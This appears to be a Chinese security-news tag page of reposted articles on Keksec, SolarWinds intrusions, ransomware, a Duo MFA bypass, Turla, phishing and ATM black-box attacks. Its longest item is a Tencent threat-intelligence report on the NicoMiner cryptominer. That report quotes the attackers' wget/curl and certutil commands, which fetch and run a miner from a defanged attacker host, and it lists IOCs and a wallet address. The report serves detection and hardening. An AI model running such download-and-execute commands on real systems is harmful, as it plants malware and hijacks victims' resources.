标签: 黑客入侵

黑客组织 Kek Security

Kek Security (Keksec)是一个极为活跃的黑客组织,Checkpoint和Netlab360的报告都对其进行了详细分析。Keksec利用多个漏洞,使用多态工具(包括Linux和Windows有效负载)自定义python恶意软件以攻击多个架构。目前该黑客组织正在积极构建IRC僵尸网络,用于DDoS攻击和勒索活动。本文详细介绍了Keksec利用的工具和使用的策略,以及相关黑客的信息。 … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1520/     消息来源:Lacework, 译者:小江; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文链接

使用腾讯安全威胁情报分析:黑灰产工具作者终走向木马开发(新挖矿木马 NicoMiner )

摘要 NicoMiner利用三个漏洞入侵传播: Hadoop Yarn未授权访问漏洞 PostgreSQL未授权漏洞 PostgreSQL提权代码执行漏洞(CVE-2019-9193); 利用漏洞入侵成功后会针对Windows、Linux系统分别投放门罗币矿机; 感染量增长较快,一个月内翻倍,受害服务器约3000台; 针对Windows、Linux两个平台的挖矿木马使用相同的钱包; 关联分析发现疑似作者ID:Nico Jiang; 通过腾讯安图查询历史情报,发现作者疑似从事刷量相关的黑产记录。   一、概述 腾讯安全威胁情报中心捕获一起快速增长的挖矿木马NicoMiner,该木马通过Hadoop Yarn未授权访问漏洞、PostgreSQL未授权及提权代码执行漏洞(CVE-2019-9193)进行入侵攻击,会根据操作系统不同分别植入Windows和Linux平台的门罗币挖矿木马。 由于攻击者使用的域名和样本PDB信息中包含“nico jiang”的ID信息,腾讯安全威胁情报中心将该挖矿木马命名为NicoMiner。根据该挖矿木马使用的钱包算力推算,该木马在近一个月内感染量已翻倍,估计受害服务器已达3000台左右。 进一步溯源分析还发现,“nico jiang”在较早时候已从事黑灰产业,该ID陆续注册了与游戏推广、刷量黑灰产有关的域名,近期启用之前留置的相关网络资源从事挖矿黑产。也不排除近期可能有其他黑客掌控 “nico jiang”曾经注册的相关域名和开发设备,用来制作、传播NicoMiner挖矿木马。 腾讯安全全系列产品已支持对NicoMiner挖矿木马攻击传播的各个环节进行检测防御: 排查和加固 由于NicoMiner挖矿木马的攻击呈现明显增长趋势,腾讯安全专家建议企业客户参考以下步骤对系统进行排查和加固: 1.删除进程和文件: 文件: /*/pgsql-*/data/java.* /*/pgsql/data/java.* /*/postgres/*/data/LinuxTF /tmp/java Windows系统 c:\postgresql\*\data\conhost.exe c:\postgresql\*\data\sqltools.exe c:\windows\temp\st.exe c:\program files\postgresql\data\pg*\sqltools.exe 检查CPU占用高的进程: java LinuxTF conhost.exe sqltools.exe 2.加固系统: Hadoop 1)如果Hadoop环境仅对内网提供服务,请不要将其服务开放到外网可访问。 2)如果必须开启公网访问,Hadoop在2.X以上版本提供了安全认证功能,建议管理员升级并启用Kerberos的认证功能,阻止未经授权的访问。 PostgreSQL 1)修改PostgreSQL的访问配置/data/pgsql/9.3/data/pg_hba.conf,限制不受信任的对象进行访问; 2)谨慎考虑分配pg_read_server_files、pg_write_server_files、pg_execute_server_program 角色权限给数据库客户。 二、样本分析 漏洞入侵 1)Hadoop Yarn未授权访问漏洞 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。客户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API(默认前者)允许客户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,攻击者可以在未授权的情况下远程执行代码。 攻击者通过扫描暴露在公网的的8088端口,发现没有开启特定客户安全认证的集群,并通过YARN RESET API提交应用,提交任务的客户名为dr.who。 攻击者在创建的Hadoop应用中通过Post hxxp://ip:8088/ws/v1/cluster/apps执行恶意命令为: wget hxxp://raw.nicosoft.org/java && chmod x java && ./java || curl -O hxxp://raw.nicosoft.org/java && chmod x java && ./java 该命令从黑客控制的服务器上下载挖矿木马java并启动。 2)PostgreSQL未授权访问漏洞 PostgreSQL未授权访问漏洞主要是由于管理员配置不当形成的。PostgreSQL配置文件在/data/pgsql/9.3/data/pg_hba.conf,如果管理员没有正确的配置信任的主机,(如下图),则会导致任意客户无需密码均可访问PostgreSQL数据库。 3)PostgreSQL提权代码执行漏洞(CVE-2019-9193) 2019年3月安全研究人员披露了PostgreSQL提权代码执行漏洞(CVE-2019-9193)的漏洞细节,具有数据库服务端文件读权限的攻击者利用此漏洞,可执行任意系统命令。 此次披露的漏洞存在于导入导出数据的命令“COPY TO/FROM PROGRAM””中,“pg_read_server_files”组内客户执行上述命令后,可获取数据库超级客户权限,从而执行任意系统命令。该漏洞几乎影响了PostgreSQL的所有版本(从9.3到最新版本),同时也影响了所有的操作系统:Windows,Linux和Mac。 受影响PostgreSQL版本:PostgreSQL >=9.3 攻击者通过批量扫描5432端口发现PostgreSQL服务器,然后利用未授权访问漏洞获得了PostgreSQL数据库的访问权限,接着再利用PostgreSQL提权代码执行漏洞(CVE-2019-9193)根据不同的系统执行以下恶意命令: 针对Linux系统: sh -c curl -O hxxp://raw.nicosoft.org/java && chmod +x java && ./java 针对Windows系统: certutil -urlcache -split -f hxxp://raw.nicosoft.org/conhost.exe conhost.exe&start conhost.exe 挖矿 入侵Linux系统下载的挖矿木马java: 入侵Windows系统后下载的dowanload木马conhost.exe,负责继续下载和启动挖矿木马SqlTools.exe 挖矿木马SqlTools.exe   挖矿使用矿池:xmr.f2pool.com 两种系统下的挖矿木马使用同一个钱包: 42Pv7VF4etz1dDPkjRWDEec2FVoFzSPDYKCsjNXDdusaTShBZZn6nr8GyNsqu8ekjSU17jmu7h6SfLg1Lr3rrJnHVokCbso 钱包收益:7个XMR 过去一个月钱包算力翻番,从150kH/s左右涨到了300kH/s,这也意味着感染的机器翻了一倍,估算在3000台左右。   三、关联分析 分析样本发现,dowanload木马conhost.exe中保留了文件的PDB信息,其中“Nico Jiang”疑似木马作者的ID号。 C:\Users\Nico Jiang\source\repos\NicoSoft\x64\Release\conhost.pdb 通过腾讯安图高级威胁溯源系统查询木马下载使用的域名“raw.nicosoft.org”,同样发现了注册者的名字为“Nico Jiang”,推测该ID号是攻击者的可能性较高。 通过搜索引擎搜索,发现域名注册的QQ邮箱对应QQ号所有者,在某个论坛接一些批量登录工具的开发需求。 该ID注册的另一个域名ns-game.top 通过该域名注册使用的outlook邮箱,查询到在github提交的项目,属于相关平台的辅助管理插件: 结论 从对ID “nico jiang”搜索到的信息来看,可以判断该ID对应的人员是一位软件开发人员,曾经从事一些网站、游戏或知名应用的批量登陆工具,刷量工具的开发,具有一定的灰产属性,而相关记录大都在2016年。 可疑的地方是,注册人显示为”nico jiang”的域名raw.nicosoft.org、ns-game.top的注册时间分别在2017年和2018年,而PDB信息包含”nico jiang”的木马样本conhost.exe编译日期是2021年3月21日(更早的样本也只再2021年2月开始出现),两者相隔较远。 推测可能有两种结论,第一种是”nico jiang”在从事灰产的时候注册了相关域名,并在发现了挖矿具有很大的获利空间之后,转向了制作挖矿木马的黑产,并且使用了之前注册的相关域名来提供下载服务。 第二种是有其他黑产获得了”nico jiang”的域名,以及”nico jiang”所使用过的电脑(PDB路径中的客户名通常是开发机器的客户名)的控制权,并且利用这些资源来开发和传播挖矿木马。根据已有的线索来看,属于第一种情况的可能性较大,腾讯安全威胁情报中心会将相关线索提交给有关部门,以对不法分子进行身份确认和追踪。   三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口,确认可攻击目标存在的Web服务:Hadoop Yarn, PostgreSQL等。 资源开发 注册C2服务器,制作downlaoder木马,挖矿木马 初始访问 利用对外开放的Hadoop Yarn, PostgreSQL服务漏洞,植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令,随后下载挖矿木马 防御规避 木马文件加壳保护,将文件命名伪装为系统文件 影响 门罗币矿机不间断的工作,会导致系统CPU负载过大,大量消耗主机CPU资源,严重影响主机正常服务运行,导致主机有系统崩溃风险。 订阅腾讯安全威胁情报产品,赋能全网安全设备 该团伙相关的威胁数据已加入腾讯安全威胁情报,可赋能给腾讯全系列安全产品,推荐政企客户通过订阅腾讯安全威胁情报产品,让全网安全设备同步具备相应的威胁检测、防御能力。 公有云的安全防护 推荐政企客户在公有云中部署腾讯云防火墙、腾讯主机安全(云镜)等产品检测防御相关威胁。 腾讯云防火墙(云镜)已支持拦截利用PostgreSQL提权代码执行漏洞(CVE-2019-9193)发起的恶意攻击行为。 腾讯主机安全可对病毒攻击过程中产生得木马落地文件进行自动检测,客户可后台一键隔离,删除。 私有云的安全防护 私有云客户可通过腾讯T-Sec高级威胁检测系统进行流量检测分析,及时发现黑客团伙的攻击活动。腾讯T-Sec高级威胁检测系统(御界)可检测到利用PostgreSQL提权代码执行漏洞(CVE-2019-9193)发起的恶意攻击行为。 NicoMiner挖矿木马会危害Linux、Windows双平台系统,推荐企业私有云客户在每台终端、服务器部署腾讯T-Sec零信任无边界访问控制系统(iOA),腾讯iOA集成病毒防护和漏洞修复能力可防御病毒木马对终端和服务器的破坏活动。腾讯iOA通过验证客户身份、设备及应用安全状态确定是否允许客户访问企业业务,确保对企业公有云、私有云以及本地业务的可信访问。无论员工位于何处、使用何设备,都可安全访问企业资源和数据。 腾讯安全响应清单 腾讯安全系列产品针对NicoMiner挖矿木马攻击的具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)威胁情报已加入,可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考: https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 (CCMS) 1)NicoMiner相关情报已加入。 腾讯安全云监测系统,面向行业客户的监管方和被监管方,结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等,为客户提供全面、及时的互联网风险监测评估服务,并可提供配套安全管家服务,可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1)NicoMiner相关情报已支持检索,可自动关联分析到该病毒家族最新变种,使用资产。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。腾讯T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud  Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,阻断恶意攻击流量,阻断恶意通信流量: 1)NicoMiner相关联的IOCs已支持识别检测; 2)已支持检测以下漏洞利用攻击: Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持NicoMiner关联模块的检测告警,查杀清理。 2)已支持检测主机存在的以下相关漏洞: Hadoop未授权访问漏洞、Postgres未授权访问漏洞 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 (SOC) 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)NicoMiner相关联的IOCs已支持识别检测; 2)已支持检测以下漏洞利用攻击: Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 (iOA) 1)已支持NicoMiner关联模块的检测告警,查杀清理。 零信任无边界访问控制系统(iOA)是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念,推出的网络边界访问管控整体解决方案。更多资料,可参考:https://s.tencent.com/product/ioa/index.html   IOCs Domain raw.nicosoft.org IP 154.91.1.27(ZoomEye搜索结果) Md5 Java df840b3decb91ae7480b2ccf95df9f9a Java dba1ef891aed1c769014a0d3aa5ed321 Java 1aa6a96f4a6fcc5c4309f2406d3479ba CONHOST.EXE 32b8a44ee3214ab56e1edbaa016918c7 CONHOST.EXE 0a31ae5882697455a071f73191ed661c CONHOST.EXE 2c31a7243f00afe467e2994d3c249024 conhost.exe bf825890526386dd96e82d2ce57e0303 SqlTools.exe 84757d6b1a94021f246d14b37c1015b8 task.exe 52cd60289ffe8e14c5aa6cb8ea8ad730 LinuxTF f453b9c09ea2fb6a194b5d81d515b0e8 URL hxxp://raw.nicosoft.org/SqlTools.exe hxxp://nicosoft.org/SqlTools.exe hxxp://154.91.1.27/SqlTools.exe hxxp://nicosoft.org/sqltools.exe hxxp://154.91.1.27/sqltools.exe hxxp://raw.nicosoft.org/java hxxp://raw.nicosoft.org/conhost.exe hxxp://154.91.1.27/task.exe hxxp://154.91.1.27/conhost.exe hxxp://154.91.1.27/WinRing0x64.sys hxxp://154.91.1.27/LinuxTF   参考链接: https://s.tencent.com/research/report/1206.html https://s.tencent.com/research/report/1175.html https://cloud.tencent.com/developer/article/1472565  

报道称 SolarWinds 黑客或已入侵 NASA 和 FAA 网络

据《华盛顿邮报》周二报道,SolarWinds黑客或已入侵美国宇航局(NASA)和美国联邦航空管理局(FAA)的网络,这是针对美国政府机构和私营公司的更广泛的间谍活动的一部分。这是在参议院情报委员会举行听证会前几个小时发生的,该委员会的任务是调查这次广泛的网络攻击。美国政府此前表示,这次攻击“很可能源自俄罗斯”。 NASA发言人没有对该报道提出异议,但以 “正在进行的调查”为由拒绝发表评论。FAA的发言人没有回应置评请求。 据悉,NASA和FAA是被证实受到攻击的9个政府机构中剩下的两个未命名的机构。其他七家包括商务部、能源部、国土安全部、司法部和国务院、财政部和国家卫生研究院,不过据信攻击者并没有入侵他们的机密网络。FireEye、微软和Malwarebytes等多家网络安全公司也在攻击中被攻破。 据报道,拜登政府正在准备对俄罗斯进行制裁,很大程度上是因为黑客攻击活动,《华盛顿邮报》也报道了这一消息。 去年,FireEye在自己的网络被攻破后,对黑客活动发出警报后,发现了这些攻击。每个受害者都是美国软件公司SolarWinds的客户,该公司的网络管理工具被联邦政府和财富500强企业广泛使用。黑客入侵SolarWinds的网络,在其软件中植入后门,并将后门与受污染的软件更新推送到客户网络中。 这不是唯一的入侵方式。据称,黑客还瞄准了其他公司,侵入受害者网络上的其他设备和电器,以及瞄准微软厂商,入侵其他客户的网络。 上周,上个月被提拔到白宫国家安全委员会,担任负责网络和新兴技术的副国家安全顾问的前国家安全局网络安全主管安妮·诺伊伯格表示,这次攻击花了 “几个月的时间来计划和执行”,“我们需要一些时间来逐层揭开这个真相”。         (消息及封面来源:cnBeta)

黑客攻击联网情趣用品以勒索赎金

一名黑客控制了连接到互联网的智能情趣用品:男性远程贞操笼,并要求用比特币支付赎金来解锁。“你的丁丁已经被我锁定。”根据一名安全研究人员获得的对话截图,黑客对其中一名受害者说。这位研究人员的名字叫Smelly,是收集恶意软件样本的网站vx-underground的创始人。 去年10月,安全研究人员发现,一款物联网情趣用品贞操笼,一种主要在BDSM社区中使用的放置并锁定在阴茎周围并可以联网远程上锁和解锁的性玩具制造商留下了一个API暴露,给了恶意黑客控制设备的机会。根据一位安全研究人员获得的黑客和几位受害者之间的对话截图,非常糟糕的事情就这样发生了。 不过万幸的是,”这件事发生的时候,我并没有锁上这个东西。”Robert在一次在线聊天中说,不然后果真的不堪设想。 受害者Robert表示,他收到了黑客的信息,要求支付0.02比特币(约合今天750美元)来解锁设备。他意识到自己的笼子肯定被 “锁住了”以至于无法使用。 “我现在已经不是笼子的主人了,所以我在任何时候都不能完全控制笼子。”另一位名叫RJ的受害者在一次在线聊天中表示。他收到了黑客发来的信息,黑客说他们已经控制了笼子,并希望支付一笔钱来解锁笼子。 这些黑客再次表明,仅仅因为你可以将某样东西连接到互联网上,并不意味着你必须这样做,尤其是如果你随后不注意保护设备或其连接的安全。 这款设备的中国制造商Qiui没有回应置评请求,这款设备的名字很贴切,叫做Cellmate。 对Cellmate设备进行安全查验的Pentest Partners安全研究员亚历克斯-洛马斯(Alex Lomas)证实,一些用户确实收到了勒索信息,并表示这凸显了这些设备制造商改进安全实践的必要性。           (消息及封面来源:cnBeta)

SolarWinds 新漏洞可使黑客安装 SUPERNOVA 恶意软件

黑客可能已利用SolarWinds Orion软件中的身份验证绕过漏洞,在目标环境中部署SUPERNOVA恶意软件。 CERT协调中心发布的咨询报告表示,用于与所有其他Orion系统监视和管理产品接口的SolarWinds Orion API存在安全漏洞(CVE-2020-10148),该漏洞可能允许黑客执行未经身份验证的攻击API命令,从而导致SolarWinds实例的妥协。 SolarWinds在12月24日发布的安全公告表示,黑客可通过利用Orion Platform中的漏洞来部署恶意软件。但到目前为止,我们仍不清楚相关漏洞的细节。 在过去的一周中,Microsoft透露黑客可能正在滥用SolarWinds的Orion软件,在目标系统上投放另一种名为SUPERNOVA的恶意软件。 网络安全公司Palo Alto Networks的Unit 42威胁情报小组和GuidePoint Security也证实了这一点,他们都将其描述为.NET Web Shell:一种通过修改SolarWinds Orion应用程序的“ app_web_logoimagehandler.ashx.b6031896.dll”模块。 虽然DLL的目的是通过HTTP API将用户配置的图像返回到Orion Web应用程序的其他组件,但恶意添加使它可以从被控制的服务器接收远程命令并在服务器用户上下文中的内存执行命令。 Unit 42研究人员指出:“SUPERNOVA的新颖之处在于:在内存中执行、其参数存在极强的复杂性、.NET运行时实施完整的编程API存在极强的灵活性。” 政府机构和网络安全专家正在努力挽救此次黑客攻击的后果,并汇总全球入侵活动。 为了修复身份验证绕过漏洞,安全专家建议用户将SolarWinds Orion Platform更新至最新版本: 2019.4 HF 6(2020年12月14日发布) 2020.2.1 HF 2(2020年12月15日发布) 2019.2 SUPERNOVA补丁(2020年12月23日发布) 2018.4 SUPERNOVA补丁(2020年12月23日发布) 2018.2 SUPERNOVA补丁(2020年12月23日发布)       消息及封面来源:The Hacker News,译者:江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 

英国一大型整容连锁医院遭黑客攻击勒索

据外媒体报道,近日,有黑客窃取了英国一家大型整容连锁店– Hospital Group的数据并威胁要公布患者手术前后的照片和其他细节。Hospital Group目前已经证实遭到了勒索软件的攻击。该公司表示,其已将此事告知信息专员(Information Commissioner)。 黑客组织REvil在其暗网网页上表示,顾客的照片并不完全是令人愉快的景象。它声称已经获得了超过900G的病人照片。 遭到网络攻击的Hospital Group–也被称为Transform Hospital Group–声称是英国减肥和美容手术的领先者。 据悉,它拥有11家专门从事减肥手术、隆胸、乳头矫正和鼻子调整的诊所。 该公司此前曾通过名人代言来宣传自己,不过已经有好几年没有这样做了。 前Big Brother选手Aisleyne Horgan-Wallace 2009年曾向Zoo杂志透露了她在Hospital Group做过丰胸手术。Atomic Kitten歌手Kerry Katona、《无耻之徒》女演员Tina Malone和真人秀《The Only Way is Essex》明星Joey Essex也都曾是该诊所的病人。 Hospital Group在一份声明中说道:“我们可以证实我们的IT系统已经遭遇了数据安全漏洞。虽然我们所有病人的支付卡信息都未被泄露,但在现阶段,我们了解到一些病人的个人数据可能已被访问。” 该公司表示,他们已经向所有客户发送了有关此次网络攻击的电子邮件并将联系可能有更多个人信息被泄露的个人。 勒索软件是最常见的网络攻击形式之一。它通常涉及黑客进入计算机网络、对文件进行加密或将用户锁定在系统之外直到被攻击一方支付赎金。 针对这种现象,执法机构不鼓励受害者支付赎金,因为这样做会助长犯罪团伙的犯罪火焰。 网络安全公司EMSIsoft估计,在2020年,这种迅速发展的网络犯罪形式为犯罪分子带来了250亿美元的收入。 REvil–也被称为Sodinokibi–是最多产的勒索软件组织之一。备受瞩目的受害者包括货币交易所Travelex和娱乐律师事务所Grubman Shire Meiselas & Sacks。       (消息来源:cnBeta;封面来自网络)

黑客组织找到一种巧妙的方法绕过目标网络的多因素身份认证

一伙为不法分子提供攻击工具的黑客找到了一种非常巧妙的方法,能够绕过目标网络的多因素身份验证(MFA)系统。根据安全公司 Volexity 本周一发布的博文,他们在 2019 年年末和 2020 年年初发现了这些攻击者的踪迹,并不少于 3 次利用该方法潜入某些机构内部。 在一次入侵期间,Volexity 的研究人员注意到黑客使用一种新颖技术绕过了 Duo 提供的 MFA 保护。在受感染的网络上获得管理员特权后,黑客使用这些不受束缚的权限从运行 Outlook Web App 的服务器上窃取了名为 akey (企业为各种网络服务提供帐号身份验证)的 Duo 机密。 然后,黑客使用 akey 生成 cookies。因此,当拥有正确用户名和密码的用户登录之后,黑客就能通过 cookies 接管账户。Volexity 认为该方法是由黑客集团  Dark Halo 提供的。研究人员 Damien Cash,Matthew Meltzer,Sean Koessel,Steven Adair 和 Thomas Lancaster 写道: “在 Volexity 对 Dark Halo 的第二次调查进入尾声的时候,研究人员观察到黑客通过 Outlook Web App 访问了用户的电子邮件账户。出于某些原因,这是完全意外的,最重要的原因是目标邮箱是受到 MFA 保护的。 来自Exchange服务器的日志显示,攻击者提供的用户名和密码身份验证正常,但没有通过Duo受到第二方面的挑战。来自Duo身份验证服务器的日志进一步表明,未尝试登录到该帐户。 Volexity能够确认不涉及会话劫持,并且通过OWA服务器的内存转储,还可以确认攻击者提供了与名为duo-sid的Duo MFA会话绑定的cookie。 Volexity对这一事件的调查确定,攻击者已从OWA服务器访问了Duo集成密钥(akey)。然后,该密钥使攻击者可以得出在duo-sid cookie中设置的预先计算的值。成功进行密码身份验证后,服务器评估了duo-sid cookie并确定其有效。 这使攻击者知道用户帐户和密码,然后完全绕过帐户上设置的MFA。此事件强调了确保与密钥集成关联的所有机密(例如与MFA提供者的机密)在发生泄露后应进行更改的必要性。此外,重要的是,不仅要在违规后更改密码,而且不要将密码设置为与以前的密码类似的内容(例如,Summer2020!vs Spring2020!或SillyGoo $ e3 vs SillyGoo $ e2)。”         (消息及封面来源:cnBeta)

黑客组织 Turla 被曝利用 Dropbox 存储恶意软件窃取来的数据

ESET 安全研究人员指出,疑似有俄方背景的黑客组织 Turla,正在利用前所未有的方式,存储恶意软件窃取来的相关数据。此前有研究称 Turla 涉嫌在欧盟外交机构部署了后门程序,并窃取了敏感文件。此外在 2015 到 2020 年初的活动中,该组织还利用了此前未知的 Crutch 恶意软件框架。 Crutch 恶意软件架构图(来自:ESET) ESET 安全研究人员 Matthieu Faou 在今日公布的一份报告中称:“攻击的复杂性和已发现的技术细节,进一步增强了我们对 Turla 组织拥有大量资源来运营如此庞大而多样化的网络攻击武器库的看法”。 此外 Crutch 甚至能够滥用合法的基础架构(本文以 Dropbox 网盘为例)来绕过某些安全层,以便将自身隐于正常的网络流量,从操作者手上接收命令并窃取机密文档。 之所以怀疑 Turla 有俄方背景,是因为 ESET 研究人员发现 Crutch 与 2016~2017 年间的 Gazer 网络安全威胁有相似之处。 其使用了相同的 RC4 密钥来解密有效负载,且应用了与 2017 年 9 月的一台受感染的计算机上几乎相同的 PDB 路径和文件名。 基于此,Matthieu Faou 认为 Crutch 只是 Turla 网络攻击武器库家族的其中一部分。 此外根据 2018 年 10 月 ~ 2019 年 7 月间 500 多个被盗上传至 Dropbox 账户的 ZIP 存档文件时间戳,Crutch 幕后操作者的工作时间,也与俄罗斯地区的 UTC +3 时区保持一致。       (消息及封面来源:cnBeta)

Check Point:今年 11 月包裹投递钓鱼诈骗案上升 400%

Check Point的研究人员发现,利用DHL、亚马逊和联邦快递的品牌,试图让人们在网购高峰期分出信息的钓鱼诈骗活动增加了400%。两周前,Check Point的研究人员记录了针对网上购物者的 “特别优惠”的恶意网络钓鱼活动增加了80%,最新的峰值出现在使用 “跟踪您的货物”和 “交付问题”等主题词。 DHL是全球被模仿最多的品牌,占到与运输相关的钓鱼邮件总量的56%,其次是亚马逊的37%和联邦快递的7%。 虽然美国和欧洲的增幅最大,但其他地区的增幅也很大。在欧洲,运费钓鱼邮件增加了401%,其中77%是假冒的DHL。美国的航运钓鱼邮件增加了427%,其中亚马逊是被冒充最多的品牌,65%是假冒的亚马逊送货邮件。在亚太地区,送货钓鱼邮件增加了185%,其中65%是与DHL品牌有关。 “黑客正在追寻整个在线购物体验,在人们购物之前和之后,”Check Point的数据情报经理Omer Dembinsky说。“首先,黑客会从他们最喜欢的品牌向人们的收件箱发送’特别优惠’。然后,黑客会发送一封关于交付购买的电子邮件,即使你是从一个值得信赖的来源购买的。” “现在 “黑色星期五 “和 “网络星期一 “已经结束,我们正在转向等式的另一边,也就是送货。当你在这个假日季节打开任何购买后的电子邮件时,请三思。这封邮件可能来自黑客。仔细查看任何声称自己来自亚马逊、DHL或联邦快递的电子邮件。我们很清楚,黑客在网上购物体验的每一步都在瞄准网上购物者,在你购物前后,危险是非常真实的。” 诈骗范例:     (消息及封面来源:cnBeta)

黑客组织利用黑匣子攻击技术从意大利 ATM 机中盗走了 80 万欧元

黑客组织利用黑匣子攻击技术从至少35台意大利ATM机中盗窃了80万欧元。 意大利人Carabinieri证实该黑客组织有12人,其中6人已经被捕,3人目前在波兰被押制,1人在被逮捕之前返回摩尔多瓦,还有2人可能已离开意大利。 据当地媒体报道,该团伙在米兰、蒙扎、博洛尼亚、摩德纳、罗马、维泰博、曼托瓦、维琴察和帕尔马省设有众多后勤基地。 黑匣子 攻击技术旨在通过“黑匣子”设备发送命令强制ATM分配现金。在此攻击中,黑匣子设备(移动设备或Raspberry)物理连接到ATM以向计算机发送命令。 没有采取良好保护措施的ATM更容易遭受此类攻击,因为黑客很容易就连接上移动设备。 7月,ATM机领先制造商Diebold Nixdorf向客户发出了警报:黑匣子攻击产生了新变种。比利时的Agenta银行在被攻击后被迫关闭143台ATM。 比利时当局观察到,所有受感染的机器都是 Diebold Nixdorf ProCash 2050xe 设备。 根据 Diebold Nixdorf发布在ZDNet上的安全警报描述:黑匣子攻击的新变种已在欧洲的某些国家/地区被黑客利用。           消息及封面来源:securityaffairs;译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ”